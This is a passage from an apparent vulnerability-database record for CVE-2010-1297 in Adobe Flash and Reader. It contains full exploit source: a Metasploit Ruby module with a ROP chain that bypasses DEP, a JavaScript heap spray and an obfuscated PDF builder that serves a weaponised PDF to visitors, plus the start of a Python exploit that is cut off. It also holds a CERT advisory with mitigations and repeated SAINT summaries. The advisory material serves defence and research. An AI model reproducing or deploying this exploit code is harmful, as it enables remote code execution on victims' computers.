pdf.length\n pdf << io_def(16) << n_obfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol\n pdf << \"stream\" << eol\n pdf << swf << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb"}, {"lastseen": "2020-08-27T01:47:31", "description": "This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a hardcoded syscall number.\n", "published": "2010-06-10T20:28:05", "type": "metasploit", "title": "Adobe Flash Player \"newfunction\" Invalid Pointer Use", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2017-09-09T02:19:55", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASHPLAYER_NEWFUNCTION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player \"newfunction\" Invalid Pointer Use',\n 'Description' => %q{\n This module exploits a vulnerability in the DoABC tag handling within\n versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due a hardcoded syscall number.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Found being openly exploited\n 'jduck' # Metasploit version\n ],\n 'References' =>\n [\n ['CVE', '2010-1297'],\n ['OSVDB', '65141'],\n ['BID', '40586'],\n ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],\n # For SWF->PDF embedding\n ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'HTTP::compression' => 'gzip',\n 'HTTP::chunked' => true,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd\n # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\n # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Jun 04 2010',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n # load the static swf file\n path = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2010-1297.swf\" )\n fd = File.open( path, \"rb\" )\n @swf_data = fd.read(fd.stat.size)\n fd.close\n\n super\n end\n\n def on_request_uri(cli, request)\n\n print_status(\"Sending crafted PDF w/SWF\")\n\n js_data = make_js(regenerate_payload(cli).encoded)\n pdf_data = make_pdf(@swf_data, js_data)\n send_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\n\n # Handle the payload\n handler(cli)\n end\n\n\n def make_js(encoded_payload)\n\n # The following executes a ret2lib using BIB.dll\n # The effect is to bypass DEP and execute the shellcode in an indirect way\n stack_data = [\n 0xc0c0c0c,\n 0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\n 0xcccccccc,\n 0x70048ef, # xchg eax,esp / ret\n 0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\n 0xcccccccc,\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009033, # ret 0x18\n 0x7009084, # ret\n 0xc0c0c0c,\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7001599, # pop ebp / ret\n 0x10124,\n 0x70072f7, # pop eax / ret\n 0x10104,\n 0x70015bb, # pop ecx / ret\n 0x1000,\n 0x700154d, # mov [eax], ecx / ret\n 0x70015bb, # pop ecx / ret\n 0x7ffe0300, # -- location of KiFastSystemCall\n 0x7007fb2, # mov eax, [ecx] / ret\n 0x70015bb, # pop ecx / ret\n 0x10011,\n 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\n 0x70015bb, # pop ecx / ret\n 0x10100,\n 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\n 0x70072f7, # pop eax / ret\n 0x10011,\n 0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)\n 0x7005c54, # pop esi / add esp,0x14 / ret\n 0xffffffff,\n 0x10100,\n 0x0,\n 0x10104,\n 0x1000,\n 0x40,\n # The next bit effectively copies data from the interleaved stack to the memory\n # pointed to by eax\n # The data copied is:\n # \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\n # \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\n # \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\n 0x700d731, # mov eax, [ebp-0x24] / ret\n 0x70015bb, # pop ecx / ret\n 0x9054905a,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x5815eb5a,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x18891a8b,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x8304c083,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xfb8104c2,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xc0c0c0c,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x5ebee75,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xffffe6e8,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x909090ff,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90909090,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90909090,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90ffffff,\n 0x700154d, # mov [eax], ecx / ret\n 0x700d731, # mov eax, [ebp-0x24] / ret\n 0x700112f # call eax -- (execute stub to transition to full shellcode)\n ].pack('V*')\n\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_shellcode = rand_text_alpha(rand(100) + 1)\n\n var_start = rand_text_alpha(rand(100) + 1)\n\n var_s = 0x10000\n var_c = rand_text_alpha(rand(100) + 1)\n var_b = rand_text_alpha(rand(100) + 1)\n var_d = rand_text_alpha(rand(100) + 1)\n var_3 = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(100) + 1)\n var_4 = rand_text_alpha(rand(100) + 1)\n\n payload_buf = ''\n payload_buf << stack_data\n payload_buf << encoded_payload\n\n escaped_payload = Rex::Text.to_unescape(payload_buf)\n\n js = %Q|\nvar #{var_unescape} = unescape;\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\n#{var_b} += #{var_shellcode};\n#{var_b} += #{var_c};\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\nvar #{var_4} = new Array();\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj\\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(swf, js)\n\n swf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\n\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n #pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<</Type/Catalog\")\n pdf << n_obfu(\"/Pages \") << io_ref(3)\n pdf << n_obfu(\"/OpenAction \") << io_ref(5)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<</Type/Pages/Count 1/Kids [\") << io_ref(4) << n_obfu(\"]>>\") << eol << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(4) << n_obfu(\"<</Type/Page/Parent \") << io_ref(3)\n pdf << n_obfu(\"/Annots [\") << io_ref(7) << n_obfu(\"] \")\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # js action\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<</Type/Action/S/JavaScript/JS \") + io_ref(6) + \">>\" << eol << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(6) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # swf annotation object\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<</Type/Annot/Subtype/RichMedia\")\n pdf << n_obfu(\"/Rect [20 20 187 69] \")\n pdf << n_obfu(\"/RichMediaSettings \") << io_ref(8)\n pdf << n_obfu(\"/RichMediaContent \") << io_ref(9)\n pdf << n_obfu(\"/NM (\") << swf_name << n_obfu(\")\")\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media settings\n xref << pdf.length\n pdf << io_def(8)\n pdf << n_obfu(\"<</Type/RichMediaSettings/Subtype/Flash\")\n pdf << n_obfu(\"/Activation \") << io_ref(10)\n pdf << n_obfu(\"/Deactivation \") << io_ref(11)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media content\n xref << pdf.length\n pdf << io_def(9)\n pdf << n_obfu(\"<</Type/RichMediaContent\")\n pdf << n_obfu(\"/Assets \") << io_ref(12)\n pdf << n_obfu(\"/Configurations [\") << io_ref(14) << \"]\"\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media activation / deactivation\n xref << pdf.length\n pdf << io_def(10)\n pdf << n_obfu(\"<</Type/RichMediaActivation/Condition/PO>>\")\n pdf << eol << endobj\n\n xref << pdf.length\n pdf << io_def(11)\n pdf << n_obfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\")\n pdf << eol << endobj\n\n # rich media assets\n xref << pdf.length\n pdf << io_def(12)\n pdf << n_obfu(\"<</Names [(#{swf_name}) \") << io_ref(13) << n_obfu(\"]>>\")\n pdf << eol << endobj\n\n # swf embeded file ref\n xref << pdf.length\n pdf << io_def(13)\n pdf << n_obfu(\"<</Type/Filespec /EF <</F \") << io_ref(16) << n_obfu(\">> /F(#{swf_name})>>\")\n pdf << eol << endobj\n\n # rich media configuration\n xref << pdf.length\n pdf << io_def(14)\n pdf << n_obfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\")\n pdf << n_obfu(\"/Instances [\") << io_ref(15) << n_obfu(\"]>>\")\n pdf << eol << endobj\n\n # rich media isntance\n xref << pdf.length\n pdf << io_def(15)\n pdf << n_obfu(\"<</Type/RichMediaInstance/Subtype/Flash\")\n pdf << n_obfu(\"/Asset \") << io_ref(13)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # swf stream\n # NOTE: This data is already compressed, no need to compress it again...\n xref << pdf.length\n pdf << io_def(16) << n_obfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol\n pdf << \"stream\" << eol\n pdf << swf << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb"}], "cert": [{"lastseen": "2020-09-18T20:42:04", "bulletinFamily": "info", "cvelist": ["CVE-2010-1297"], "description": "### Overview \n\nAdobe Flash contains a vulnerability in the handling of the ActionScript newfunction instruction, which can allow a remote, unauthenticated attacker to execute arbitrary code.\n\n### Description \n\nAdobe Flash 9 and later versions support ActionScript 3, which is executed by the ActionScript Virtual Machine 2 (AVM2). The AVM2 takes ActionScript Bytecode (ABC) as input, and it is just-in-time (JIT) compiled into processor-specific instructions. Certain malformed use of the AVM2 newfunction instruction can result in an exploitable crash. This vulnerability affects Flash Player 9 through 10.0.45.2. Adobe Reader 9, Acrobat 9, and other Adobe products (including Photoshop CS3, PhotoShop Lightroom, Freehand MX, Fireworks) provide Flash support independent of Flash Player.\n\nThis vulnerability is being exploited in the wild. Exploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), PDF file, Microsoft Office document, or any other document that supports embedded SWF content, an attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThis vulnerability is addressed in Flash 10.1. Please see Adobe Security Bulletin [APSB10-14 ](<http://www.adobe.com/support/security/bulletins/apsb10-14.html>)for more details. \n \n--- \n \n**Disable Flash in your web browser** \n \nDisable Flash or selectively enable Flash content as described in [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/>). \n \n**Disable Flash and 3D & Multimedia support in Adobe Reader 9** \n \nFlash and 3D & Multmedia support are implemented as plug-in libraries in Adobe Reader. Disabling Flash in Adobe Reader will only mitigate attacks using an SWF embedded in a PDF file. Disabling 3D & Multimedia support does not directly address the vulnerability, but it does provide additional mitigation and results in a more user-friendly error message instead of a crash. \n \nTo disable Flash and 3D & Multimedia support in Adobe Reader 9 on Microsoft Windows, delete or rename these files: \n \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\authplay.dll\"` \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\rt3d.dll\"` \n \nFor Apple Mac OS X, delete or rename these files: \n \n`\"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/AuthPlayLib.bundle\"` \n`\"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/Adobe3D.framework\"` \nFor GNU/Linux, delete or rename these files (locations may vary among distributions): \n \n`\"/opt/Adobe/Reader9/Reader/intellinux/lib/libauthplay.so\"` \n`\"/opt/Adobe/Reader9/Reader/intellinux/lib/librt3d.so\"` \n \nFile locations may be different for Adobe Acrobat or other Adobe products that include Flash and 3D & Multimedia support. Disabling these plug-ins will reduce functionality and will not protect against SWF files hosted on websites. Depending on the update schedule for products other than Flash Player, consider leaving Flash and 3D & Multimedia support disabled unless they are absolutely required. \n \n**Remove Flash** \n \nAdobe has provided a [TechNote](<http://kb2.adobe.com/cps/141/tn_14157.html>) with utilities for uninstalling the Flash Player plug-in and ActiveX control on Windows and Mac OS X systems. Removing these components can mitigate the web browser attack vector for this vulnerability. Note that this will not remove the instances of Flash Player that is installed with Adobe Reader 9 or other Adobe products. \n \n**Enable DEP in Microsoft Windows** \n \nConsider enabling Data Execution Prevention (DEP) in supported versions of Windows. DEP should not be treated as a complete workaround, but it can mitigate the execution of attacker-supplied code in some cases. Microsoft has published detailed technical information about DEP in Security Research & Defense blog posts \"Understanding DEP as a mitigation technology\" [part 1](<http://blogs.technet.com/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx>) and [part 2](<http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx>). Use of DEP should be considered in conjunction with the application of patches or other mitigations described in this document. \n \n**Disable JavaScript in Adobe Reader and Acrobat** \n \nDisabling JavaScript can help mitigate against some techniques that use Adobe Reader as an attack vector. \n \nTo disable JavaScript in Adobe Reader: \n\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `JavaScript` section.\n 5. Uncheck the `Enable Acrobat JavaScript` checkbox.\nDisabling JavaScript will not resolve the vulnerabilities, it will only disable the vulnerable JavaScript component. When JavaScript is disabled, Adobe Reader and Acrobat prompt to re-enable JavaScript when opening a PDF that contains JavaScript. \n \n**Prevent Internet Explorer from automatically opening PDF documents** \n \nThe installer for Adobe Reader and Acrobat configures Internet Explorer to automatically open PDF files without any user interaction. This behavior can be reverted to the safer option of prompting the user by importing the following as a .REG file: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_CLASSES_ROOT\\AcroExch.Document.7]` \n`\"EditFlags\"=hex:00,00,00,00` \n \n**Disable the displaying of PDF documents in the web browser** \n \nPreventing PDF documents from opening inside a web browser reduces the attack surface. If this workaround is applied to updated versions of Adobe Reader and Acrobat, it may protect against future vulnerabilities. \n \nTo prevent PDF documents from automatically being opened in a web browser with Adobe Reader: \n\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `Internet` section.\n 5. Uncheck the `Display PDF in browser` checkbox. \n--- \n \n### Vendor Information\n\n486225\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Adobe __ Affected\n\nNotified: January 25, 2010 Updated: June 10, 2010 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThis vulnerability is addressed in Flash 10.1. Please see Adobe Security Bulletin [APSB10-14 ](<http://www.adobe.com/support/security/bulletins/apsb10-14.html>)for more details.\n\n### Vendor References\n\n * <http://www.adobe.com/support/security/bulletins/apsb10-14.html>\n * <http://www.adobe.com/support/security/advisories/apsa10-01.html>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9 | AV:N/AC:M/Au:N/C:C/I:C/A:P \nTemporal | 7 | E:POC/RL:OF/RC:C \nEnvironmental | 7 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://www.adobe.com/support/security/bulletins/apsb10-14.html>\n * <http://www.adobe.com/support/security/advisories/apsa10-01.html>\n * <http://www.adobe.com/devnet/actionscript/articles/avm2overview.pdf>\n * <http://labs.adobe.com/technologies/flashplayer10/>\n * <http://blog.zynamics.com/2010/06/09/analyzing-the-currently-exploited-0-day-for-adobe-reader-and-adobe-flash/>\n * <http://www.symantec.com/connect/blogs/analysis-zero-day-exploit-adobe-flash-and-reader>\n * <http://community.websense.com/blogs/securitylabs/archive/2010/06/09/having-fun-with-adobe-0-day-exploits.aspx>\n * <http://secunia.com/advisories/40026>\n * <http://www.f-secure.com/weblog/archives/00001962.html>\n * <http://blogs.technet.com/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx>\n * <http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx>\n\n### Acknowledgements\n\nThis vulnerability was reported by Will Dormann of the CERT/CC. It has also been independently discovered and exploited in the wild.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2010-1297](<http://web.nvd.nist.gov/vuln/detail/CVE-2010-1297>) \n---|--- \n**Severity Metric:** | 43.09 \n**Date Public:** | 2010-06-04 \n**Date First Published:** | 2010-06-07 \n**Date Last Updated: ** | 2012-03-28 14:47 UTC \n**Document Revision: ** | 47 \n", "modified": "2012-03-28T14:47:00", "published": "2010-06-07T00:00:00", "id": "VU:486225", "href": "https://www.kb.cert.org/vuls/id/486225", "type": "cert", "title": "Adobe Flash ActionScript AVM2 newfunction vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-05-29T17:19:51", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "edition": 2, "description": "Added: 06/17/2010 \nCVE: [CVE-2010-1297](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297>) \nBID: [40586](<http://www.securityfocus.com/bid/40586>) \nOSVDB: [65141](<http://www.osvdb.org/65141>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA memory corruption vulnerability in `**authplay.dll**` provided with Adobe Reader 9.3.2 and earlier 9.x versions allows command execution when a user opens a specially crafted PDF file that contains Shockwave Flash (SWF) content that calls the `**newfunction()**` function with invalid parameters. \n\n### Resolution\n\nApply the patches referenced in [APSA10-01](<http://www.adobe.com/support/security/advisories/apsa10-01.html>) when they become available. In the interim, follow the relevant directions for mitigating the vulnerability in Adobe Reader. \n\n### References\n\n<http://secunia.com/advisories/40034> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.3.0. \n\nThe user must open the exploit file in Adobe Reader. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-06-17T00:00:00", "published": "2010-06-17T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_authplaydll_newfunction", "id": "SAINT:770782F23BE978D80AAD6E9F9088C70A", "type": "saint", "title": "Adobe Reader authplay.dll newfunction Memory Corruption", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:01", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "description": "Added: 06/17/2010 \nCVE: [CVE-2010-1297](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297>) \nBID: [40586](<http://www.securityfocus.com/bid/40586>) \nOSVDB: [65141](<http://www.osvdb.org/65141>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA memory corruption vulnerability in `**authplay.dll**` provided with Adobe Reader 9.3.2 and earlier 9.x versions allows command execution when a user opens a specially crafted PDF file that contains Shockwave Flash (SWF) content that calls the `**newfunction()**` function with invalid parameters. \n\n### Resolution\n\nApply the patches referenced in [APSA10-01](<http://www.adobe.com/support/security/advisories/apsa10-01.html>) when they become available. In the interim, follow the relevant directions for mitigating the vulnerability in Adobe Reader. \n\n### References\n\n<http://secunia.com/advisories/40034> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.3.0. \n\nThe user must open the exploit file in Adobe Reader. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2010-06-17T00:00:00", "published": "2010-06-17T00:00:00", "id": "SAINT:4087FA9BA2E83B1761565A4E280BC32F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_authplaydll_newfunction", "type": "saint", "title": "Adobe Reader authplay.dll newfunction Memory Corruption", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:35", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "description": "Added: 06/17/2010 \nCVE: [CVE-2010-1297](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297>) \nBID: [40586](<http://www.securityfocus.com/bid/40586>) \nOSVDB: [65141](<http://www.osvdb.org/65141>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA memory corruption vulnerability in `**authplay.dll**` provided with Adobe Reader 9.3.2 and earlier 9.x versions allows command execution when a user opens a specially crafted PDF file that contains Shockwave Flash (SWF) content that calls the `**newfunction()**` function with invalid parameters. \n\n### Resolution\n\nApply the patches referenced in [APSA10-01](<http://www.adobe.com/support/security/advisories/apsa10-01.html>) when they become available. In the interim, follow the relevant directions for mitigating the vulnerability in Adobe Reader. \n\n### References\n\n<http://secunia.com/advisories/40034> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.3.0. \n\nThe user must open the exploit file in Adobe Reader. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2010-06-17T00:00:00", "published": "2010-06-17T00:00:00", "id": "SAINT:77C0093237F1AF8B89C92BAD6DF70E05", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_authplaydll_newfunction", "title": "Adobe Reader authplay.dll newfunction Memory Corruption", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Acrobat Reader and Flash Player - newclass Invalid Pointer", "edition": 1, "published": "2010-09-01T00:00:00", "title": "Adobe Acrobat Reader and Flash Player - newclass Invalid Pointer", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-09-01T00:00:00", "id": "EXPLOITPACK:4125F09B17C03F68D9E1171B95C97590", "href": "", "sourceData": "'''\n __ __ ____ _ _ ____ \n | \\/ |/ __ \\ /\\ | | | | _ \\ \n | \\ / | | | | / \\ | | | | |_) |\n | |\\/| | | | |/ /\\ \\| | | | _ < Day 1 (Binary Analysis)\n | | | | |__| / ____ \\ |__| | |_) |\n |_| |_|\\____/_/ \\_\\____/|____/ \n\nhttp://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14853.tar.gz (moaub1-adobe-newclass.tar.gz)\n\n Title : Adobe Acrobat Reader and Flash Player \u201cnewclass\u201d invalid pointer vulnerability\n Analysis : http://www.abysssec.com\n Vendor : http://www.adobe.com\n Impact : Ciritical\n Contact : shahin [at] abysssec.com , info [at] abysssec.com\n Twitter : @abysssec\n CVE : CVE-2010-1297\n MOAUB Number : MOAUB-01-BA\n'''\n\nimport sys\n\nclass PDF:\n \n\tdef __init__(self):\n\t\tself.xrefs = []\n\t\tself.eol = '\\x0a'\n\t\tself.content = ''\n\t\tself.xrefs_offset = 0\n\t\t\n\tdef header(self):\n\t\tself.content += '%PDF-1.6' + 